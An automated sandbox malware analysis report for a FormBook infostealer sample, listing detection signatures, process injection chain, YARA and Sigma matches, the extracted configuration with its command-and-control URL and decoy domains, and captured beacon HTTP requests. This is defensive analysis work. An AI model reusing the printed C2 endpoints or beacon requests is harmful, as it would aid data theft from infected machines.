Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report TT.exe

Overview

General Information

Sample Name:TT.exe
Analysis ID:403976
MD5:27c863c479b0542b3bad21a67ad1406d
SHA1:791e1d123c275ac4451c5550635c0a67eb4398a6
SHA256:2a7a9c6d4505766ddf0a6c7dde9c2ae52369408fbe5ce93d0d3d76bf992b28dd
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: System File Execution Location Anomaly
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • TT.exe (PID: 6588 cmdline: 'C:\Users\user\Desktop\TT.exe' MD5: 27C863C479B0542B3BAD21A67AD1406D)
    • TT.exe (PID: 6624 cmdline: 'C:\Users\user\Desktop\TT.exe' MD5: 27C863C479B0542B3BAD21A67AD1406D)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 7052 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 6640 cmdline: /c del 'C:\Users\user\Desktop\TT.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.knighttechinca.com/dxe/"], "decoy": ["sardarfarm.com", "959tremont.com", "privat-livecam.net", "ansel-homebakery.com", "joysupermarket.com", "peninsulamatchmakers.net", "northsytyle.com", "radioconexaoubermusic.com", "relocatingrealtor.com", "desyrnan.com", "onlinehoortoestel.online", "enpointe.online", "rvvikings.com", "paulpoirier.com", "shitarpa.net", "kerneis.net", "rokitreach.com", "essentiallygaia.com", "prestiged.net", "fuerzaagavera.com", "soukid.com", "moderndatingcoach.com", "mentalfreedom.guru", "bullishsoftware.com", "sectorulb.com", "outletyana.com", "fptplaybox.website", "artinmemory.com", "buyruon.com", "ljd.xyz", "mondaysmatters.com", "spiritsoundart.net", "ixiangzu.com", "lacompagniadelfardello.com", "bnctly.com", "sarasvati-yoga.com", "0055game.com", "lagrangewildliferemoval.com", "umlausa.com", "chaytel.com", "kkkc5.com", "union-green.com", "philreid4cc.com", "theanimehat.com", "redlightlegal.com", "myaustraliarewards.com", "barkinlot.com", "mujahidservice.online", "nugeneraonline.com", "sopplugin.com", "makemyroom.design", "ferienschweden.com", "fps2020dkasphotoop.com", "stylezbykay.com", "royalpropertiesgurugram.com", "birzulova.com", "cosmicmtn.com", "kissanime.press", "poweringprogress.today", "omsamedic.com", "drunkpoetsociety.com", "hostbison.com", "asapdecor.com", "houseofsisson.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.597321036.0000000002F60000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.597321036.0000000002F60000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.597321036.0000000002F60000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.392835395.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.392835395.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.TT.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.TT.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.TT.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        1.2.TT.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.TT.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: System File Execution Location AnomalyShow sources
          Source: Process startedAuthor: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community: Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: 'C:\Users\user\Desktop\TT.exe' , ParentImage: C:\Users\user\Desktop\TT.exe, ParentProcessId: 6624, ProcessCommandLine: , ProcessId: 3440
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 7052

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000007.00000002.597321036.0000000002F60000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.knighttechinca.com/dxe/"], "decoy": ["sardarfarm.com", "959tremont.com", "privat-livecam.net", "ansel-homebakery.com", "joysupermarket.com", "peninsulamatchmakers.net", "northsytyle.com", "radioconexaoubermusic.com", "relocatingrealtor.com", "desyrnan.com", "onlinehoortoestel.online", "enpointe.online", "rvvikings.com", "paulpoirier.com", "shitarpa.net", "kerneis.net", "rokitreach.com", "essentiallygaia.com", "prestiged.net", "fuerzaagavera.com", "soukid.com", "moderndatingcoach.com", "mentalfreedom.guru", "bullishsoftware.com", "sectorulb.com", "outletyana.com", "fptplaybox.website", "artinmemory.com", "buyruon.com", "ljd.xyz", "mondaysmatters.com", "spiritsoundart.net", "ixiangzu.com", "lacompagniadelfardello.com", "bnctly.com", "sarasvati-yoga.com", "0055game.com", "lagrangewildliferemoval.com", "umlausa.com", "chaytel.com", "kkkc5.com", "union-green.com", "philreid4cc.com", "theanimehat.com", "redlightlegal.com", "myaustraliarewards.com", "barkinlot.com", "mujahidservice.online", "nugeneraonline.com", "sopplugin.com", "makemyroom.design", "ferienschweden.com", "fps2020dkasphotoop.com", "stylezbykay.com", "royalpropertiesgurugram.com", "birzulova.com", "cosmicmtn.com", "kissanime.press", "poweringprogress.today", "omsamedic.com", "drunkpoetsociety.com", "hostbison.com", "asapdecor.com", "houseofsisson.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: TT.exeVirustotal: Detection: 25%Perma Link
          Source: TT.exeReversingLabs: Detection: 40%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.597321036.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.392835395.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.393512483.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.335739935.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.344692024.0000000003030000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.597417500.0000000002F90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.392976261.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.TT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TT.exe.3030000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TT.exe.3030000.4.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: TT.exeJoe Sandbox ML: detected
          Source: 1.2.TT.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.TT.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.TT.exe.3030000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: TT.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: TT.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.366025907.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: msdt.pdbGCTL source: TT.exe, 00000001.00000002.396335168.0000000002810000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: TT.exe, 00000000.00000003.331979334.0000000003060000.00000004.00000001.sdmp, TT.exe, 00000001.00000002.393874457.0000000000B4F000.00000040.00000001.sdmp, msdt.exe, 00000007.00000002.598843723.0000000004DFF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: TT.exe, msdt.exe
          Source: Binary string: msdt.pdb source: TT.exe, 00000001.00000002.396335168.0000000002810000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.366025907.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\TT.exeCode function: 0_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004059F0
          Source: C:\Users\user\Desktop\TT.exeCode function: 0_2_0040659C FindFirstFileA,FindClose,0_2_0040659C
          Source: C:\Users\user\Desktop\TT.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.knighttechinca.com/dxe/
          Source: global trafficHTTP traffic detected: GET /dxe/?oZN=7nbLudZHS&mdslXXV=s4725d3Oabb4GJPvvzs1NGtrQqdCSFbT14B5hiC+hEbCkkM6v8NMU0M9YHV7hr/JdwNsVvK8Ug== HTTP/1.1Host: www.philreid4cc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?mdslXXV=c1qXo+D3OeWS7aQwzsMJrh0J2W+ZcnXSIybZATOUAxrA4uZvd+OeJvPZ6sfOQ4L/XOcBlc02WQ==&oZN=7nbLudZHS HTTP/1.1Host: www.sectorulb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?oZN=7nbLudZHS&mdslXXV=pSmvUx3Cd9o2ehLRUYmTuUG+rz67XAZoYuLBzxOhEanl5TCXMyweO2X8MqC68oVFQcjckZtQvA== HTTP/1.1Host: www.lagrangewildliferemoval.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 192.0.78.24 192.0.78.24
          Source: Joe Sandbox ViewASN Name: AUTOMATTICUS AUTOMATTICUS
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: Joe Sandbox ViewASN Name: EGIHOSTINGUS EGIHOSTINGUS
          Source: global trafficHTTP traffic detected: GET /dxe/?oZN=7nbLudZHS&mdslXXV=s4725d3Oabb4GJPvvzs1NGtrQqdCSFbT14B5hiC+hEbCkkM6v8NMU0M9YHV7hr/JdwNsVvK8Ug== HTTP/1.1Host: www.philreid4cc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?mdslXXV=c1qXo+D3OeWS7aQwzsMJrh0J2W+ZcnXSIybZATOUAxrA4uZvd+OeJvPZ6sfOQ4L/XOcBlc02WQ==&oZN=7nbLudZHS HTTP/1.1Host: www.sectorulb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?oZN=7nbLudZHS&mdslXXV=pSmvUx3Cd9o2ehLRUYmTuUG+rz67XAZoYuLBzxOhEanl5TCXMyweO2X8MqC68oVFQcjckZtQvA== HTTP/1.1Host: www.lagrangewildliferemoval.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.philreid4cc.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 May 2021 13:43:34 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: explorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: TT.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: TT.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000002.596476580.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\TT.exeCode function: 0_2_0040548D GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040548D

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.597321036.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.392835395.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.393512483.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.335739935.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.344692024.0000000003030000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.597417500.0000000002F90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.392976261.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.TT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TT.exe.3030000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TT.exe.3030000.4.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000007.00000002.597321036.0000000002F60000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.597321036.0000000002F60000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.392835395.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.392835395.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.393512483.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.393512483.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.335739935.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.335739935.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.344692024.0000000003030000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.344692024.0000000003030000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.597417500.0000000002F90000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.597417500.0000000002F90000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.392976261.00000000005E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.392976261.00000000005E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.TT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.TT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
